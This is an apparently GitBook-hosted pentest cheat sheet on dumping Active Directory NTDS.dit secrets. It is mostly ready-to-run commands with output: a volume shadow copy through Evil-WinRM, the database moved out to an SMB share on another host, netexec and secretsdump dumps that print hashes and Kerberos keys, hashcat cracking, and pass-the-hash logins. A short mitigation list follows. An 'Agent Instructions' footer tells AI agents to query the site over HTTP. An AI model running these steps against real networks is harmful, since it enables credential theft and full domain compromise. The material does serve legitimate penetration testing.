# NTDS secrets {% hint style="info" %} *Requires Domain Admin* {% endhint %} ## Shadow copy of c:\ - VSS ```shell-session *Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2013 Microsoft Corp. Successfully created shadow copy for 'C:\' Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a} Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 ``` ```shell-session *Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit 1 file(s) copied. ``` Transfer over SMB - See [SAM & LSA secrets](/0xss0rz/pentest/internal-pentest/sam-and-lsa-secrets.md) to lunch SMB server or [File transfer - Download - Exfiltration](/0xss0rz/pentest/file-transfer/download-exfiltration.md) ```shell-session *Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData 1 file(s) moved. ``` ## Netexec - CME {% embed url="" %} ``` 2 methods are available: (default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with additional drsuapi calls to convert the resultant linked-lists into readable format vss - Uses the Volume Shadow copy Service ``` ``` #~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds #~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users #~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled #~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss ``` You can also DCSYNC with the computer account of the DC {% content-ref url="/pages/xnKTwmiIoj8HdMcJZAjp" %} [DCSync](/0xss0rz/pentest/internal-pentest/dcsync.md) {% endcontent-ref %} There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py ``` nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil ``` ## Secretsdump ``` $ secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43 Administrator:aes128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a Administrator:des-cbc-md5:d60dfbbf20548938 [*] Cleaning up... ``` ## Cracking - Hashes {% content-ref url="/pages/5HMI5x51XIr5GBqw1pWM" %} [Hashes](/0xss0rz/pentest/cracking/hashes.md) {% endcontent-ref %} {% content-ref url="/pages/UCKTmqsQ8EinRrV2OMwg" %} [Domain Password Audit Tools](/0xss0rz/pentest/internal-pentest/domain-password-audit-tools.md) {% endcontent-ref %} Hashes dumped are NT hash: ```shell-session sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt ``` ## Backup Operators Group ``` whoami /groups ``` This group also permits logging in locally to a domain controller. {% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %} [Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md) {% endcontent-ref %} ## Server Operators Group It is a very highly privileged group that can log in locally to servers, including Domain Controllers*.* {% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %} [Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md) {% endcontent-ref %} ## Pass the Hash (PtH) {% content-ref url="/pages/2nk7AOHO745kf6QdjHnB" %} [Pass the Hash (PtH)](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md) {% endcontent-ref %} ### Evil-WinRM ```shell-session evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b" ``` ### Netexec - CME ``` nxc smb [IP] -u USERNAME -H :NT_HASH ``` After obtaining credentials such as `Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::` you can use both the full hash or just the nt hash (second half) ``` #~ nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' #~ nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' #~ nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c' #~ nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' ``` ### Metasploit {% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %} [Metasploit](/0xss0rz/pentest/tools/metasploit.md) {% endcontent-ref %} ## Bypass EDR {% embed url="" %} ## Mitigation The following security controls should be implemented to mitigate dumping ntds.dit: * **Limit access to Domain Controllers to only privileged users that require access.** This reduces the number of opportunities for malicious actors to gain access to Domain Controllers. * **Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration.** Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘[Enterprise Access Model](https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model)’. * **Encrypt and securely store backups of Domain Controllers and limit access to only Backup Administrators.** Backups of Domain Controllers need to be afforded the same security as the actual Domain Controllers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as Domain Controllers. * **Only use Domain Controllers for AD DS and do not install any non-security-related services or applications.** This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller. * **Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity.** Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain. * **Disable the Print Spooler service on Domain Controllers.** For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access. * **Disable the Server Message Block (SMB) version 1 protocol on Domain Controllers.** There are multiple Active Directory compromises that leverage weaknesses in the SMBv1 protocol to gain access to systems, including Domain Controllers. Disabling SMBv1 on Domain Controllers and on all systems in a domain mitigates compromises that leverage the SMBv1 protocol. ## Resources {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/ntds-secrets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.